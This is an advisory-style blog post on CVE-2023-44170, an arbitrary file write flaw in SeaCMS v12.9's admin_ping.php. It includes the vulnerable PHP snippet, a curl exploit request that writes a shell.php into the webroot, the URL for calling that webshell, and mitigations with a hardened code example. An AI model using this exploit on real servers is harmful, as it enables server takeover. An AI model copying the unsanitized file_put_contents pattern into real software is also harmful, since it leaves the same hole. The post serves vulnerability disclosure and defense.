In 2023, a critical vulnerability was discovered in SeaCMS v12.9, a popular open-source video website management system used mainly in Asia. Labeled as CVE-2023-44170, this flaw allows attackers to write files to the web server via the admin_ping.php component. This means an attacker can upload malicious code (like a web shell), gain admin rights, or even totally take over the server.
In this post, we’ll explain the vulnerability in plain English, break down the bug, show a code example, and walk through an actual exploit scenario. If you use or manage SeaCMS, you should read this.
## What is Arbitrary File Write?
Arbitrary file write means an attacker can put any file, with any content, anywhere on the target server where the web app has write permissions. In web apps, this is a nightmare because the attacker can upload scripts, overwrite configuration, or set up backdoors.
The vulnerable file is `/admin/admin_ping.php`.
The bug exists because this PHP file doesn’t properly check, sanitize, or restrict user-supplied data being written to server files. In SeaCMS v12.9, this endpoint can be accessed by an authenticated user (often with weak credentials).
Here’s a code snippet showing the problem area (simplified for clarity):

```php
// admin_ping.php (simplified example)
if (isset($_POST['savestate'])) {
    $filename = $_POST['savestate'];        // User input!
    $content  = $_POST['content'];          // User input!
    file_put_contents($filename, $content); // Writes file!
    echo "ok";
}
```
The problem? No checks on what file is being written. If you POST to this script, you can overwrite any file the web user can write to. This includes adding backdoors to the webroot.
## How to Exploit (Step by Step)
Note: Only test this on systems you own or have permission to test.
- Valid credentials (weak or default ones are often used)
- Access to /admin/admin_ping.php
Send a POST request to /admin/admin_ping.php with two parameters:
- savestate: The filename to write (e.g., ../shell.php)
- content: The code/content to write (e.g., PHP webshell)

```bash
curl -X POST \
  -d "savestate=../shell.php" \
  -d "content=" \
  "http://targetsite.com/admin/admin_ping.php"
```
Access the Webshell:
Go to: http://targetsite.com/shell.php?cmd=ls
## Real-World Impact
- Full Server Compromise: An attacker can upload shells, run system commands, steal data, or deface the website.
- Data Loss: Overwriting critical files can break the site or harm other users.
## Fix / Mitigation
- Upgrade: Check for patched versions of SeaCMS.
- Restrict Access: Block public/admin access by IP or VPN.
- Sanitize Input: NEVER use user input directly in file_put_contents or similar functions.
- Remove/Disable admin_ping.php: If not needed, delete or restrict it.
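
To make the "Sanitize Input" point concrete, here is a hardened counterpart to the simplified snippet above. It is an added example, not SeaCMS code or its official patch; `STATE_DIR`, `ALLOWED_FILES`, `MAX_BYTES` and the function names are assumptions chosen for illustration.

```php
<?php
// Added example (not SeaCMS code). Assumes authentication and CSRF checks
// have already run before handle_save() is reached.
const STATE_DIR     = __DIR__ . '/data/state';      // assumed: writable dir where PHP is never executed
const ALLOWED_FILES = ['ping.txt', 'sitemap.txt'];  // assumed: the only names the feature needs
const MAX_BYTES     = 65536;                        // assumed upper bound on content size

// Map a requested name to a path inside STATE_DIR, or null if it is not acceptable.
function safe_state_path(string $requested): ?string
{
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;                                 // empty name or NUL byte
    }
    if (basename($requested) !== $requested) {
        return null;                                 // any directory part: ../x, /abs/x
    }
    if (!in_array($requested, ALLOWED_FILES, true)) {
        return null;                                 // allow-list, not a deny-list
    }
    $base = realpath(STATE_DIR);
    if ($base === false) {
        return null;                                 // target directory missing
    }
    $target = $base . DIRECTORY_SEPARATOR . $requested;
    return is_link($target) ? null : $target;        // never write through a symlink
}

// Returns the HTTP status the endpoint should answer with.
function handle_save(array $post): int
{
    $name    = $post['savestate'] ?? null;
    $content = $post['content'] ?? null;
    if (!is_string($name) || !is_string($content)) return 400;
    if (strlen($content) > MAX_BYTES) return 413;
    $path = safe_state_path($name);
    if ($path === null) return 403;
    return file_put_contents($path, $content, LOCK_EX) === false ? 500 : 200;
}

// Constructed sample inputs: one allowed name and three that must be refused.
if (PHP_SAPI === 'cli') {
    @mkdir(STATE_DIR, 0750, true);
    foreach (['ping.txt', '../shell.php', '/var/www/html/shell.php', 'shell.php'] as $n) {
        printf("%-26s => %d\n", $n, handle_save(['savestate' => $n, 'content' => 'x']));
    }
}
```

The key design choice is that the request only selects from a fixed set of names; the directory and extension are never taken from user input.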
## Summary
CVE-2023-44170 in SeaCMS v12.9 is a severe arbitrary file write bug via admin_ping.php. It’s trivial to exploit and could lead to complete webserver takeover. If you run SeaCMS, patch ASAP and block public access to the admin area. For defenders and pen testers, always check for insecure file writes – they’re a hacker’s favorite tool.
Please use this knowledge responsibly. For more exclusive security tips and walkthroughs, stay tuned!
## Timeline
Published on: 09/27/2023 15:19:38 UTC
Last modified on: 09/27/2023 16:36:29 UTC